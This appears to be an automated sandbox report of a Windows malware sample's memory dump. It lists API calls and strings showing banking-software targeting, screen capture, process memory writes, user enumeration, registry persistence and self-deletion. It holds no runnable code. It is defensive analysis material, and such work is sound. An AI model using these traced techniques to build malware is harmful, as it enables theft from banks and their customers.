Part of subcall function 00AEE209: InitializeCriticalSection.KERNEL32 ref: 00AEE21E

Part of subcall function 00AF599B: EnterCriticalSection.KERNEL32(00B227DC,00000000,00AED9CE,00DB1E90,?,?,?,00AF1992,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF59A7
Part of subcall function 00AF599B: LeaveCriticalSection.KERNEL32(00B227DC,?,?,?,00AF1992,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF59B7

Part of subcall function 00AF59C5: LeaveCriticalSection.KERNEL32(00B227DC,00AF5A45,00000002,?,?,?,00AEDAA2,00000002,00000001,000000FF), ref: 00AF59CF

Part of subcall function 00AF59D6: LeaveCriticalSection.KERNEL32(00B227DC,?,00AED9F7,00000009,00DB1E90,?,?,?,00AF1992,?,?,?,?,00B048EB), ref: 00AF59E3

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

LeaveCriticalSection.KERNEL32(00DB1E90,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF19D2

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF506A, Relevance: 7.2, APIs: 4, Instructions: 38

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00AF507A
Thread32First.KERNEL32(?,?), ref: 00AF5095
Thread32Next.KERNEL32(?,?), ref: 00AF50A8
CloseHandle.KERNEL32 ref: 00AF50B3

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFEA5E, Relevance: 7.2, APIs: 4, Instructions: 28

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001E9A0,00000000), ref: 00AFEA75
WaitForSingleObject.KERNEL32(?,00003A98), ref: 00AFEA87
TerminateThread.KERNEL32(?,00000000), ref: 00AFEA93
CloseHandle.KERNEL32 ref: 00AFEA9A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF03FD, Relevance: 5.6, APIs: 3, Instructions: 28

APIs

GetCurrentProcess.KERNEL32 ref: 00AF0400
VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00AF0421
FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 00AF042A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF06B9, Relevance: 5.5, APIs: 3, Instructions: 37

APIs

GetCurrentThreadId.KERNEL32 ref: 00AF06CE
InterlockedCompareExchange.KERNEL32(00B2276C), ref: 00AF06DA
VirtualProtect.KERNEL32(3D920000,00010000,00000040,?), ref: 00AF071E

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00DB0, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 29

APIs

Part of subcall function 00B00D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00B00D9C

RegSetValueExW.ADVAPI32(00000000,000000FE,?,00000000,?,?), ref: 00B00DE5

Part of subcall function 00B00D19: RegFlushKey.ADVAPI32 ref: 00B00D29
Part of subcall function 00B00D19: RegCloseKey.ADVAPI32 ref: 00B00D31

Strings

Software\Microsoft\Yfosteyq, xrefs: 00B00DC5

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFDBC4, Relevance: 3.1, APIs: 2, Instructions: 80

APIs

Part of subcall function 00AF5A4F: GetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A51
Part of subcall function 00AF5A4F: TlsGetValue.KERNEL32(?,?,00AEB9B4), ref: 00AF5A6E
Part of subcall function 00AF5A4F: TlsSetValue.KERNEL32(00000001), ref: 00AF5A80
Part of subcall function 00AF5A4F: SetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A90

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00AFDC28

Part of subcall function 00AF19E0: EnterCriticalSection.KERNEL32(00DB1E90), ref: 00AF19EE
Part of subcall function 00AF19E0: PathFindFileNameW.SHLWAPI(?), ref: 00AF1A21
Part of subcall function 00AF19E0: PathFindFileNameW.SHLWAPI(?), ref: 00AF1A64
Part of subcall function 00AF19E0: LeaveCriticalSection.KERNEL32(00DB1E90), ref: 00AF1A9E

LdrLoadDll.NTDLL ref: 00AFDC99

Part of subcall function 00AF5AD5: GetLastError.KERNEL32(?,00AEBA1E), ref: 00AF5AD6
Part of subcall function 00AF5AD5: TlsSetValue.KERNEL32(00000000), ref: 00AF5AE6
Part of subcall function 00AF5AD5: SetLastError.KERNEL32(?,?,00AEBA1E), ref: 00AF5AED

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFD904, Relevance: 3.1, APIs: 2, Instructions: 79

APIs

Part of subcall function 00AF5A4F: GetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A51
Part of subcall function 00AF5A4F: TlsGetValue.KERNEL32(?,?,00AEB9B4), ref: 00AF5A6E
Part of subcall function 00AF5A4F: TlsSetValue.KERNEL32(00000001), ref: 00AF5A80
Part of subcall function 00AF5A4F: SetLastError.KERNEL32(?,?,00AEB9B4), ref: 00AF5A90

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018), ref: 00AFD93C

Part of subcall function 00B0BE5A: CreateMutexW.KERNEL32(00B22974,00000001,?), ref: 00B0BEA0
Part of subcall function 00B0BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00B0BEAC
Part of subcall function 00B0BE5A: CloseHandle.KERNEL32 ref: 00B0BEBA

Part of subcall function 00AEFBD5: TlsGetValue.KERNEL32(?,?,00AFD975), ref: 00AEFBDE

Part of subcall function 00B04A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B04A89
Part of subcall function 00B04A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B04AC4
Part of subcall function 00B04A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B04B04
Part of subcall function 00B04A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B04B27
Part of subcall function 00B04A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00B04B77

CloseHandle.KERNEL32 ref: 00AFD9B1

Part of subcall function 00AF506A: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00AF507A
Part of subcall function 00AF506A: Thread32First.KERNEL32(?,?), ref: 00AF5095
Part of subcall function 00AF506A: Thread32Next.KERNEL32(?,?), ref: 00AF50A8
Part of subcall function 00AF506A: CloseHandle.KERNEL32 ref: 00AF50B3

Part of subcall function 00AF5AD5: GetLastError.KERNEL32(?,00AEBA1E), ref: 00AF5AD6
Part of subcall function 00AF5AD5: TlsSetValue.KERNEL32(00000000), ref: 00AF5AE6
Part of subcall function 00AF5AD5: SetLastError.KERNEL32(?,?,00AEBA1E), ref: 00AF5AED

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0BEE3, Relevance: 2.8, APIs: 1, Instructions: 24

APIs

CreateMutexW.KERNEL32(00B22974,00000000,?), ref: 00B0BF05

Part of subcall function 00AF2F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF2F37
Part of subcall function 00AF2F31: CloseHandle.KERNEL32 ref: 00AF2F49

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B107B1, Relevance: 2.6, APIs: 1, Instructions: 19

APIs

CoCreateInstance.OLE32(00AE17F8,00000000,00004401,00AE1858,?), ref: 00B107C6

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B10741, Relevance: 2.5, APIs: 1, Instructions: 10

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00B1074E

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00E64, Relevance: 2.2, APIs: 1, Instructions: 68

APIs

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

Part of subcall function 00B00DFC: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B00E10

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B00EBF

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF0FC3, Relevance: 2.2, APIs: 1, Instructions: 68

APIs

LoadLibraryA.KERNEL32 ref: 00AF1013

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00D74, Relevance: 2.1, APIs: 1, Instructions: 28

APIs

RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00B00D9C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00F07, Relevance: 2.0, APIs: 1, Instructions: 60

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00B00F2B

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF696E, Relevance: 1.9, APIs: 1, Instructions: 9

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 00AF6977

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00DFC, Relevance: 1.9, APIs: 1, Instructions: 8

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B00E10

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFEF56, Relevance: 1.5, APIs: 1, Instructions: 202

APIs

Part of subcall function 00B107B1: CoCreateInstance.OLE32(00AE17F8,00000000,00004401,00AE1858,?), ref: 00B107C6

lstrlenW.KERNEL32(00000000), ref: 00AFF092

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AFEDDC: lstrlenW.KERNEL32(?), ref: 00AFEF24

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Non-executed Functions

Function 00AEDBE8, Relevance: 66.8, APIs: 19, Strings: 19, Instructions: 103

APIs

StrStrIW.SHLWAPI(tellerplus), ref: 00AEDBFA
StrStrIW.SHLWAPI(bancline), ref: 00AEDC0F
StrStrIW.SHLWAPI(fidelity), ref: 00AEDC24
StrStrIW.SHLWAPI(micrsolv), ref: 00AEDC39
StrStrIW.SHLWAPI(bankman), ref: 00AEDC4E
StrStrIW.SHLWAPI(vantiv), ref: 00AEDC63
StrStrIW.SHLWAPI(episys), ref: 00AEDC78
StrStrIW.SHLWAPI(jack henry), ref: 00AEDC8D
StrStrIW.SHLWAPI(cruisenet), ref: 00AEDCA2
StrStrIW.SHLWAPI(gplusmain), ref: 00AEDCB7
StrStrIW.SHLWAPI(launchpadshell.exe), ref: 00AEDCCC
StrStrIW.SHLWAPI(dirclt32.exe), ref: 00AEDCE1
StrStrIW.SHLWAPI(wtng.exe), ref: 00AEDCF2
StrStrIW.SHLWAPI(prologue.exe), ref: 00AEDD03
StrStrIW.SHLWAPI(silverlake), ref: 00AEDD14
StrStrIW.SHLWAPI(pcsws.exe), ref: 00AEDD25
StrStrIW.SHLWAPI(v48d0250s1), ref: 00AEDD36
StrStrIW.SHLWAPI(fdmaster.exe), ref: 00AEDD47
StrStrIW.SHLWAPI(fastdoc), ref: 00AEDD58

Strings

tellerplus, xrefs: 00AEDBEF
bancline, xrefs: 00AEDC04
fidelity, xrefs: 00AEDC19
micrsolv, xrefs: 00AEDC2E
bankman, xrefs: 00AEDC43
vantiv, xrefs: 00AEDC58
episys, xrefs: 00AEDC6D
jack henry, xrefs: 00AEDC82
cruisenet, xrefs: 00AEDC97
gplusmain, xrefs: 00AEDCAC
launchpadshell.exe, xrefs: 00AEDCC1
dirclt32.exe, xrefs: 00AEDCD6
wtng.exe, xrefs: 00AEDCE7
prologue.exe, xrefs: 00AEDCF8
silverlake, xrefs: 00AEDD09
pcsws.exe, xrefs: 00AEDD1A
v48d0250s1, xrefs: 00AEDD2B
fdmaster.exe, xrefs: 00AEDD3C
fastdoc, xrefs: 00AEDD4D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF4085, Relevance: 48.4, APIs: 20, Strings: 4, Instructions: 151

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00AF4097
GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00AF40AF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AF40EE
CreateCompatibleDC.GDI32 ref: 00AF40FF
LoadCursorW.USER32(00000000,00007F00), ref: 00AF4115
GetIconInfo.USER32(?,?), ref: 00AF4129
GetCursorPos.USER32(?), ref: 00AF4138
GetDeviceCaps.GDI32(?,00000008), ref: 00AF414F
GetDeviceCaps.GDI32(?,0000000A), ref: 00AF4158
CreateCompatibleBitmap.GDI32(?,?), ref: 00AF4164
SelectObject.GDI32 ref: 00AF4172
BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00AF4193
DrawIcon.USER32(?,?,?,?), ref: 00AF41C5

Part of subcall function 00AF332C: GetProcAddress.KERNEL32(?,GdipCreateBitmapFromHBITMAP), ref: 00AF3341
Part of subcall function 00AF332C: GetProcAddress.KERNEL32(?,GdipDisposeImage), ref: 00AF334C

SelectObject.GDI32(?,00000008), ref: 00AF41E1
DeleteObject.GDI32 ref: 00AF41E8
DeleteDC.GDI32 ref: 00AF41EF
DeleteDC.GDI32 ref: 00AF41F6
FreeLibrary.KERNEL32(?), ref: 00AF4206
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00AF421C
FreeLibrary.KERNEL32(?), ref: 00AF4230

Strings

gdiplus.dll, xrefs: 00AF408C
GdiplusStartup, xrefs: 00AF40A9
DISPLAY, xrefs: 00AF40E9
GdiplusShutdown, xrefs: 00AF4216

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6A69, Relevance: 37.7, APIs: 1, Instructions: 7

APIs

HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B05087, Relevance: 34.4, APIs: 16, Strings: 1, Instructions: 241

APIs

Part of subcall function 00AF1B16: CreateFileW.KERNEL32(00DB1EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF1B2F
Part of subcall function 00AF1B16: GetFileSizeEx.KERNEL32(?,?), ref: 00AF1B42
Part of subcall function 00AF1B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AF1B68
Part of subcall function 00AF1B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00AF1B80
Part of subcall function 00AF1B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF1B9E
Part of subcall function 00AF1B16: CloseHandle.KERNEL32 ref: 00AF1BA7

CreateMutexW.KERNEL32(00B22974,00000001,?), ref: 00B0512D
GetLastError.KERNEL32(?,?,00000001,?,?,?,00B05452), ref: 00B0513D
CloseHandle.KERNEL32 ref: 00B0514B
CloseHandle.KERNEL32 ref: 00B05229

Part of subcall function 00B04BA2: memcpy.MSVCRT ref: 00B04BB2

lstrlenW.KERNEL32(?), ref: 00B051AD

Part of subcall function 00B14181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B141A1
Part of subcall function 00B14181: Process32FirstW.KERNEL32(?,?), ref: 00B141C6
Part of subcall function 00B14181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00B1421D
Part of subcall function 00B14181: CloseHandle.KERNEL32 ref: 00B1423B
Part of subcall function 00B14181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00B14257
Part of subcall function 00B14181: memcmp.MSVCRT ref: 00B1426F
Part of subcall function 00B14181: CloseHandle.KERNEL32(?), ref: 00B142E7
Part of subcall function 00B14181: Process32NextW.KERNEL32(?,?), ref: 00B142F3
Part of subcall function 00B14181: CloseHandle.KERNEL32 ref: 00B14306

ExitWindowsEx.USER32(00000014,80000000), ref: 00B051DD
OpenEventW.KERNEL32(00000002,00000000,?), ref: 00B05203
SetEvent.KERNEL32 ref: 00B05210
CloseHandle.KERNEL32 ref: 00B05217
IsWellKnownSid.ADVAPI32(00DB1EC0,00000016), ref: 00B05279
CreateEventW.KERNEL32(00B22974,00000001,00000000,?), ref: 00B05348
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B05361
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B05373
CloseHandle.KERNEL32(00000000), ref: 00B0538A
CloseHandle.KERNEL32(?), ref: 00B05390
CloseHandle.KERNEL32(?), ref: 00B05396

Part of subcall function 00AF2FB7: ReleaseMutex.KERNEL32 ref: 00AF2FBB
Part of subcall function 00AF2FB7: CloseHandle.KERNEL32 ref: 00AF2FC2

Part of subcall function 00AFE8A2: VirtualProtect.KERNEL32(00AF9777,?,00000040,?), ref: 00AFE8BA
Part of subcall function 00AFE8A2: VirtualProtect.KERNEL32(00AF9777,?,?,?), ref: 00AFE92D

Part of subcall function 00B0BAD3: memcpy.MSVCRT ref: 00B0BAEE
Part of subcall function 00B0BAD3: StringFromGUID2.OLE32(?), ref: 00B0BB92

Part of subcall function 00AF99FA: LoadLibraryW.KERNEL32(?), ref: 00AF9A1C
Part of subcall function 00AF99FA: GetProcAddress.KERNEL32(?,?), ref: 00AF9A40
Part of subcall function 00AF99FA: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00AF9A78
Part of subcall function 00AF99FA: lstrlenW.KERNEL32(?), ref: 00AF9A90
Part of subcall function 00AF99FA: StrCmpNIW.SHLWAPI(?,?), ref: 00AF9AA4
Part of subcall function 00AF99FA: lstrlenW.KERNEL32(?), ref: 00AF9ABA
Part of subcall function 00AF99FA: memcpy.MSVCRT ref: 00AF9AC6
Part of subcall function 00AF99FA: FreeLibrary.KERNEL32 ref: 00AF9ADC
Part of subcall function 00AF99FA: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00AF9B1B
Part of subcall function 00AF99FA: NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00AF9B57
Part of subcall function 00AF99FA: NetApiBufferFree.NETAPI32(?), ref: 00AF9C02
Part of subcall function 00AF99FA: NetApiBufferFree.NETAPI32(00000000), ref: 00AF9C14
Part of subcall function 00AF99FA: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00AF9C33

Part of subcall function 00AF5433: CharToOemW.USER32(00DB1EF0,?), ref: 00AF5444

Part of subcall function 00B0B0C1: GetCommandLineW.KERNEL32 ref: 00B0B0DB
Part of subcall function 00B0B0C1: CommandLineToArgvW.SHELL32 ref: 00B0B0E2
Part of subcall function 00B0B0C1: StrCmpNW.SHLWAPI(?,00AE7F1C,00000002), ref: 00B0B108
Part of subcall function 00B0B0C1: LocalFree.KERNEL32 ref: 00B0B134
Part of subcall function 00B0B0C1: MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00B0B171
Part of subcall function 00B0B0C1: memcpy.MSVCRT ref: 00B0B184
Part of subcall function 00B0B0C1: UnmapViewOfFile.KERNEL32 ref: 00B0B1BD
Part of subcall function 00B0B0C1: memcpy.MSVCRT ref: 00B0B1E0
Part of subcall function 00B0B0C1: CloseHandle.KERNEL32 ref: 00B0B1F9

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00B0BEE3: CreateMutexW.KERNEL32(00B22974,00000000,?), ref: 00B0BF05

Part of subcall function 00AF9925: memcpy.MSVCRT ref: 00AF993C
Part of subcall function 00AF9925: memcmp.MSVCRT ref: 00AF995E
Part of subcall function 00AF9925: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AF998C
Part of subcall function 00AF9925: lstrcmpiW.KERNEL32(?), ref: 00AF99DC

Part of subcall function 00AF1BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF1BC6
Part of subcall function 00AF1BB5: CloseHandle.KERNEL32 ref: 00AF1BD5

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00B05304

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF99FA, Relevance: 28.4, APIs: 13, Strings: 1, Instructions: 205

APIs

LoadLibraryW.KERNEL32(?), ref: 00AF9A1C
GetProcAddress.KERNEL32(?,?), ref: 00AF9A40
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00AF9A78
lstrlenW.KERNEL32(?), ref: 00AF9A90
StrCmpNIW.SHLWAPI(?,?), ref: 00AF9AA4
lstrlenW.KERNEL32(?), ref: 00AF9ABA
memcpy.MSVCRT ref: 00AF9AC6
FreeLibrary.KERNEL32 ref: 00AF9ADC
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00AF9B1B
NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00AF9B57

Part of subcall function 00B04ED1: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00B04EE5
Part of subcall function 00B04ED1: PathUnquoteSpacesW.SHLWAPI(?), ref: 00B04F4A
Part of subcall function 00B04ED1: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B04F59
Part of subcall function 00B04ED1: LocalFree.KERNEL32(00000001), ref: 00B04F6D

NetApiBufferFree.NETAPI32(?), ref: 00AF9C02

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

Part of subcall function 00B04461: PathSkipRootW.SHLWAPI(?), ref: 00B0448B
Part of subcall function 00B04461: GetFileAttributesW.KERNEL32(?), ref: 00B044B8
Part of subcall function 00B04461: CreateDirectoryW.KERNEL32(?,00000000), ref: 00B044CC
Part of subcall function 00B04461: SetLastError.KERNEL32(00000050), ref: 00B044EF

Part of subcall function 00AF9633: LoadLibraryW.KERNEL32(?), ref: 00AF9657
Part of subcall function 00AF9633: GetProcAddress.KERNEL32(?,?), ref: 00AF9685
Part of subcall function 00AF9633: GetProcAddress.KERNEL32(?,?), ref: 00AF969F
Part of subcall function 00AF9633: GetProcAddress.KERNEL32(?,?), ref: 00AF96BB
Part of subcall function 00AF9633: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00AF96E8
Part of subcall function 00AF9633: FreeLibrary.KERNEL32 ref: 00AF9769

NetApiBufferFree.NETAPI32(00000000), ref: 00AF9C14
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00AF9C33

Part of subcall function 00B0B70A: CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0B783
Part of subcall function 00B0B70A: SetFileAttributesW.KERNEL32(?), ref: 00B0B7A2
Part of subcall function 00B0B70A: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00B0B7B9
Part of subcall function 00B0B70A: GetLastError.KERNEL32(?,00000002,?,?), ref: 00B0B7C6
Part of subcall function 00B0B70A: CloseHandle.KERNEL32 ref: 00B0B7FF

Part of subcall function 00AF7058: GetFileSizeEx.KERNEL32(00000000,?), ref: 00AF708F
Part of subcall function 00AF7058: SetEndOfFile.KERNEL32 ref: 00AF7105
Part of subcall function 00AF7058: FlushFileBuffers.KERNEL32(?), ref: 00AF7110

Strings

.exe, xrefs: 00AF9BBC 00AF9C4D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFD2B1, Relevance: 27.2, APIs: 18, Instructions: 214

APIs

GetProcAddress.KERNEL32(?,?), ref: 00AFD2D5
GetProcAddress.KERNEL32(?,?), ref: 00AFD2F5
GetProcAddress.KERNEL32(?,?), ref: 00AFD30E
GetProcAddress.KERNEL32(?,?), ref: 00AFD327
GetProcAddress.KERNEL32(?,?), ref: 00AFD340
GetProcAddress.KERNEL32(?,?), ref: 00AFD359
GetProcAddress.KERNEL32(?,?), ref: 00AFD376
GetProcAddress.KERNEL32(?,?), ref: 00AFD393
GetProcAddress.KERNEL32(?,?), ref: 00AFD3B0
GetProcAddress.KERNEL32(?,?), ref: 00AFD3CD
GetProcAddress.KERNEL32(?,?), ref: 00AFD3EA
GetProcAddress.KERNEL32(?,?), ref: 00AFD407
GetProcAddress.KERNEL32(?,?), ref: 00AFD424
GetProcAddress.KERNEL32(?,?), ref: 00AFD441
GetProcAddress.KERNEL32(?,?), ref: 00AFD45E
GetProcAddress.KERNEL32(?,?), ref: 00AFD47B
GetProcAddress.KERNEL32(?,?), ref: 00AFD498
GetProcAddress.KERNEL32(?,?), ref: 00AFD4B5

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF9C8D, Relevance: 24.4, APIs: 10, Strings: 2, Instructions: 184

APIs

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AF9CCE
PathRemoveFileSpecW.SHLWAPI(?), ref: 00AF9D17
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AF9D3E
PathRemoveFileSpecW.SHLWAPI(?), ref: 00AF9D87
SetEvent.KERNEL32 ref: 00AF9D9A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF9DAD

Part of subcall function 00AFE4B6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AFE4E9
Part of subcall function 00AFE4B6: Sleep.KERNEL32(000001F4), ref: 00AFE57E

Part of subcall function 00B044FB: FindFirstFileW.KERNEL32(?,?), ref: 00B0452C
Part of subcall function 00B044FB: FindNextFileW.KERNEL32(?,?), ref: 00B0457E
Part of subcall function 00B044FB: FindClose.KERNEL32 ref: 00B04589
Part of subcall function 00B044FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00B04595
Part of subcall function 00B044FB: RemoveDirectoryW.KERNEL32(?), ref: 00B0459C

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AF9DF1

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

Part of subcall function 00B010E0: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B0113B
Part of subcall function 00B010E0: RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B011A5
Part of subcall function 00B010E0: RegFlushKey.ADVAPI32(00000000), ref: 00B011D3
Part of subcall function 00B010E0: RegCloseKey.ADVAPI32(00000000), ref: 00B011DA

CharToOemW.USER32(?,?), ref: 00AF9E6F
CharToOemW.USER32(?,?), ref: 00AF9E81
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00AF9EEC

Part of subcall function 00AF5482: CharToOemW.USER32(?,?), ref: 00AF54C8
Part of subcall function 00AF5482: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00AF54FF
Part of subcall function 00AF5482: CloseHandle.KERNEL32(000000FF), ref: 00AF5527
Part of subcall function 00AF5482: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 00AF5569
Part of subcall function 00AF5482: memset.MSVCRT ref: 00AF557E
Part of subcall function 00AF5482: CloseHandle.KERNEL32(000000FF), ref: 00AF55B9

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00AF9CEB
C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00AF9D5B

Memory Dump Source

